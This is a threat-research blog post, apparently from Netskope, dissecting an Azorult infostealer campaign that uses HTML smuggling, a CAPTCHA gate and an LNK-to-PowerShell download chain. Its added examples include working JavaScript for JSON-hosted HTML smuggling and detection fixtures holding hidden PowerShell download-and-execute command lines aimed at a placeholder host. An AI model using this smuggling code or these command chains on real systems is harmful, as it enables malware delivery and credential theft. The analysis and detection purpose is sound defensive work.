Summary
Netskope Threat Labs has observed an evasive Azorult campaign in the wild that employs multiple defense evasion techniques from delivery through execution to fly under the defender’s radar as it steals sensitive data.
Azorult is an information stealer first discovered in 2016 that steals sensitive information including user credentials, browser information, and crypto wallet data. Azorult is on the rise and is currently one of the top malware families that Netskope Threat Labs has observed targeting the healthcare industry over the last year.
In this blog post, Netskope Threat Labs performs a detailed teardown of an evasive Azorult malware campaign we observed in the wild. This campaign is noteworthy for the following reasons:
- It delivers its initial payload through HTML smuggling, a detection evasion technique that is gaining popularity among adversaries. The same technique was used by a nation-state group to smuggle a remote access trojan, and by Nokoyawa ransomware, which began its infection chain with HTML smuggling.
- It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website.
- It executes the fileless Azorult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts.
- It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.
- It steals sensitive data, including information for 137 distinct crypto wallets, login credentials, browser files, and important documents.
Google Sites serves as a decoy for HTML smuggling
HTML smuggling is a defense evasion technique that aims to bypass web controls that block risky file types. It abuses the legitimate HTML5 download attribute and JavaScript Blob objects to construct the malicious file on the client side, so network security filters inspecting the traffic never see the blocked file type in transit.
As part of Netskope Threat Labs' threat hunting activities, we uncovered a campaign in which an attacker created fake Google Docs pages on Google Sites and used HTML smuggling from those pages to deliver malicious payloads. Victims are lured to the fake Google Docs pages so that they believe the downloaded file came from Google Docs. In most cases we see in the wild, the adversary embeds the smuggled payload in the JavaScript itself. In this campaign, the adversary instead placed the payload in a separate JSON file as a Base64-encoded string. When the victim accesses the website, the page sends a GET request for the JSON file on a separate domain (mahmudiyeresort[.]com[.]tr) and extracts the payload from it.
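The client side of this technique, as an added example that is not code from the Netskope post or from the campaign: a benign reconstruction of the JSON-hosted variant described above. The JSON field name (`data`), the URL, the file name and the payload bytes are constructed stand-ins, since the post does not give the real JSON layout; the payload here is a short text file rather than an LNK.

```javascript
// Added example, not code from the Netskope post or from the campaign: a
// benign reconstruction of the HTML-smuggling variant described above, where
// the base64 payload is fetched from a JSON document on a second host instead
// of being embedded in the script. The JSON field name ("data"), the URL and
// the payload bytes are constructed stand-ins; the post does not give the
// real JSON layout.

// Constructed stand-in for the remote JSON body. The payload is a harmless
// text file here; in the campaign it was an LNK shortcut with a PDF icon.
const SAMPLE_JSON = JSON.stringify({
  data: Buffer.from("harmless placeholder payload\n").toString("base64"),
});

// Step 1: pull the base64 string out of the JSON document.
function extractBase64(jsonText, field = "data") {
  const doc = JSON.parse(jsonText);
  if (typeof doc[field] !== "string") {
    throw new Error(`JSON has no string field "${field}"`);
  }
  return doc[field];
}

// Step 2: decode to raw bytes. atob() is what in-browser smuggling code uses;
// Node's Buffer is the fallback so the example also runs on the command line.
function decodePayload(b64) {
  if (typeof atob === "function") {
    const bin = atob(b64);
    return Uint8Array.from(bin, (ch) => ch.charCodeAt(0));
  }
  return new Uint8Array(Buffer.from(b64, "base64"));
}

// Step 3: the Blob + HTML5 download-attribute trick. The file is assembled in
// the browser, so a proxy that blocks .lnk downloads only ever sees a JSON
// response. This part needs a DOM and is skipped outside a browser.
function triggerDownload(bytes, filename) {
  if (typeof document === "undefined") return false;
  const blob = new Blob([bytes], { type: "application/octet-stream" });
  const a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = filename; // HTML5 download attribute
  document.body.appendChild(a);
  a.click();
  a.remove();
  URL.revokeObjectURL(a.href);
  return true;
}

// Synchronous core, so it can be exercised offline with SAMPLE_JSON.
function smuggleFromJson(jsonText, filename) {
  const bytes = decodePayload(extractBase64(jsonText));
  return { bytes, downloaded: triggerDownload(bytes, filename) };
}

// Browser-side entry point: in the campaign the URL was a JSON file on
// mahmudiyeresort[.]com[.]tr, a different domain from the Google Sites page.
async function smuggle(url, filename) {
  const res = await fetch(url);
  return smuggleFromJson(await res.text(), filename);
}

console.log(
  smuggleFromJson(SAMPLE_JSON, "placeholder.bin").bytes.length,
  "bytes reconstructed client-side"
);
```

From the network's point of view the page issues an ordinary GET for a JSON document on an unrelated domain, and the file materialises from a blob: URL inside the browser, so a download-type filter at the proxy has nothing to block. Detection has to move to the endpoint or the browser: a download event whose source is a blob: or data: URL, a file with a risky extension written by the browser shortly after a JSON fetch, or page scripts that combine atob, Blob and the download attribute.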
Smuggling with a CAPTCHA
Usually, when a victim accesses a website that uses HTML smuggling to deliver malicious payloads, the payload is downloaded immediately. In this campaign, the attacker's Google Sites page first presents a CAPTCHA, which serves as an additional layer of protection against URL scanners: automated services such as VirusTotal cannot proceed past the CAPTCHA, so the smuggling HTML stays undetected in public scanners.
Malicious shortcut downloads multiple PowerShell and JavaScript files
Once the user passes the CAPTCHA test, the HTML smuggling Javascript code reconstructs the payload and downloads it to the victim’s machine. The payload is an LNK shortcut file that uses a PDF icon to trick users into clicking it. Clicking on the LNK file kicks off the following chain of events.
- The LNK file spawns a command prompt that writes a Base64-encoded PowerShell command to a batch file named `Fyap4cKJ.bat`.
- The PowerShell command is then decoded with the Windows-native `certutil.exe`, which overwrites `Fyap4cKJ.bat` with the decoded content.
- A scheduled task named `t09pxsrXKG` is created to execute the batch file `Fyap4cKJ.bat`.
- The batch file `Fyap4cKJ.bat` runs a PowerShell script that uses `Invoke-WebRequest` to download a PHP file from `sqjeans[.]com`, saves it as `qtoW0vI2.js` in the temp folder, and then executes `qtoW0vI2.js` with `wscript.exe`.
- The PowerShell command from `Fyap4cKJ.bat` then deletes the scheduled task `t09pxsrXKG` created earlier.
The JavaScript file `qtoW0vI2.js` then performs the following three tasks:
- Copies itself into `%ProgramData%` and renames itself `agent.js`.
- Checks for a file named `7z52OJFPXT4J` in the temp folder and deletes itself if that file exists.
- Downloads two PowerShell scripts named `agent1.ps1` and `agent3.ps1` using `Invoke-WebRequest` and executes them using `Invoke-Expression`.
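The chain in the two lists above, turned into detection logic as an added example (not code from the Netskope post or from the campaign). It runs a small set of behavioural rules over constructed process-creation events and correlates them across process trees: the scheduled task launches the batch file under the Task Scheduler service, not as a child of the command prompt the LNK spawned, so a parent-child correlation alone splits the chain in two. The event records, the file and task names (`stage1.bat`, `task1`, `stage2.js`), the paths and the host `example.invalid` are stand-ins; the campaign's own names were single-use, which is exactly why a rule should not depend on them. The same download-cradle rule also covers the later `agent.js` stage, where `Invoke-WebRequest` output is fed to `Invoke-Expression`.

```javascript
// Added example, not code from the Netskope post or the campaign: behavioural
// detection for the LNK -> batch -> scheduled task -> PowerShell -> wscript
// chain, over constructed process-creation events (Sysmon Event ID 1 style:
// pid, ppid, image, command line). Names, paths and the host example.invalid
// are stand-ins for the campaign's Fyap4cKJ.bat, t09pxsrXKG, qtoW0vI2.js and
// sqjeans[.]com, which a rule should not match on because they rotate.

const TEMP = "C:\\Users\\victim\\AppData\\Local\\Temp";

// Constructed events. pids 1000-1102 are the explorer tree (the LNK click);
// pids 900-1203 are the Task Scheduler service tree that later runs the batch
// file, so one chain spans two process trees. 2000-2001 are benign noise.
const SAMPLE_EVENTS = [
  { pid: 1000, ppid: 1, image: "C:\\Windows\\explorer.exe", cmd: "explorer.exe" },
  { pid: 1100, ppid: 1000, image: "C:\\Windows\\System32\\cmd.exe",
    cmd: `cmd.exe /c echo cG93ZXJzaGVsbCAtZW5jIC4uLg== > ${TEMP}\\stage1.bat` },
  { pid: 1101, ppid: 1100, image: "C:\\Windows\\System32\\certutil.exe",
    cmd: `certutil -decode ${TEMP}\\stage1.bat ${TEMP}\\stage1.bat` },
  { pid: 1102, ppid: 1100, image: "C:\\Windows\\System32\\schtasks.exe",
    cmd: `schtasks /create /tn task1 /tr "${TEMP}\\stage1.bat" /sc once /st 00:00` },
  { pid: 900, ppid: 1, image: "C:\\Windows\\System32\\svchost.exe",
    cmd: "svchost.exe -k netsvcs -p -s Schedule" },
  { pid: 1200, ppid: 900, image: "C:\\Windows\\System32\\cmd.exe",
    cmd: `cmd.exe /c ${TEMP}\\stage1.bat` },
  { pid: 1201, ppid: 1200, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    cmd: `powershell -w hidden -c "Invoke-WebRequest https://example.invalid/x.php -OutFile ${TEMP}\\stage2.js; Start-Process wscript.exe ${TEMP}\\stage2.js; schtasks /delete /tn task1 /f"` },
  { pid: 1202, ppid: 1201, image: "C:\\Windows\\System32\\wscript.exe",
    cmd: `wscript.exe ${TEMP}\\stage2.js` },
  { pid: 1203, ppid: 1201, image: "C:\\Windows\\System32\\schtasks.exe",
    cmd: "schtasks /delete /tn task1 /f" },
  { pid: 2000, ppid: 1, image: "C:\\Windows\\System32\\certutil.exe",
    cmd: "certutil -decode C:\\certs\\server.b64 C:\\certs\\server.cer" },
  { pid: 2001, ppid: 1, image: "C:\\Windows\\System32\\schtasks.exe",
    cmd: 'schtasks /create /tn Backup /tr "C:\\Program Files\\Backup\\backup.exe" /sc daily /st 02:00' },
];

const SCRIPT_EXT = /\.(?:bat|cmd|js|jse|vbs|wsf|ps1)\b/i;
const SCRIPT_PATHS = /[a-z]:\\[^\s"']+\.(?:bat|cmd|js|jse|vbs|wsf|ps1)\b/gi;
const USER_WRITABLE = /\\(?:temp|appdata|programdata|users\\public|downloads)\\/i;
const isImage = (e, name) => e.image.toLowerCase().endsWith(`\\${name}.exe`);

// Each rule describes one step of the chain by behaviour, not by file name.
const RULES = [
  { name: "certutil-decodes-script",
    test: (e) => isImage(e, "certutil") && /\s-decode(?:hex)?\b/i.test(e.cmd) && SCRIPT_EXT.test(e.cmd) },
  { name: "schtasks-runs-script-from-user-writable-path",
    test: (e) => isImage(e, "schtasks") && /\/create\b/i.test(e.cmd)
      && USER_WRITABLE.test(e.cmd) && SCRIPT_EXT.test(e.cmd) },
  { name: "powershell-download-cradle",
    test: (e) => isImage(e, "powershell")
      && /invoke-webrequest|\biwr\b|downloadstring|downloadfile/i.test(e.cmd)
      && /invoke-expression|\biex\b|start-process|wscript|cscript|-outfile/i.test(e.cmd) },
  { name: "script-host-runs-from-user-writable-path",
    test: (e) => (isImage(e, "wscript") || isImage(e, "cscript"))
      && USER_WRITABLE.test(e.cmd) && SCRIPT_EXT.test(e.cmd) },
  { name: "schtasks-deletes-task",
    test: (e) => isImage(e, "schtasks") && /\/delete\b/i.test(e.cmd) },
];

// Walk ppid links to the top of the process tree we have events for.
function rootOf(e, byPid) {
  const seen = new Set([e.pid]);
  while (byPid.has(e.ppid) && !seen.has(e.ppid)) {
    e = byPid.get(e.ppid);
    seen.add(e.pid);
  }
  return e.pid;
}

// Group fired rules per process tree, then merge trees that touch the same
// script file, so the Task Scheduler half is joined to the LNK-click half.
function analyze(events) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const trees = new Map();
  for (const e of events) {
    const root = rootOf(e, byPid);
    if (!trees.has(root)) trees.set(root, { roots: new Set([root]), paths: new Set(), rules: new Set() });
    const t = trees.get(root);
    for (const p of e.cmd.match(SCRIPT_PATHS) || []) t.paths.add(p.toLowerCase());
    for (const r of RULES) if (r.test(e)) t.rules.add(r.name);
  }
  const groups = [...trees.values()];
  let merged = true;
  while (merged) {
    merged = false;
    for (let i = 0; i < groups.length && !merged; i++) {
      for (let j = i + 1; j < groups.length && !merged; j++) {
        if ([...groups[i].paths].some((p) => groups[j].paths.has(p))) {
          for (const k of ["roots", "paths", "rules"]) groups[j][k].forEach((x) => groups[i][k].add(x));
          groups.splice(j, 1);
          merged = true;
        }
      }
    }
  }
  return groups.filter((g) => g.rules.size > 0).map((g) => ({
    roots: [...g.roots].sort((a, b) => a - b),
    rules: [...g.rules].sort(),
    severity: g.rules.size >= 3 ? "high" : "low",
  }));
}

console.log(JSON.stringify(analyze(SAMPLE_EVENTS), null, 2));
```

Run on the constructed events, the two benign records (an administrator decoding a certificate, a scheduled backup under Program Files) fire nothing, while the two halves of the chain are joined through the shared `stage1.bat` path into one high-severity finding. Any one of these steps is common enough on its own (`schtasks /delete` especially); the value is in the sequence, which is why the scoring is per correlated group rather than per event.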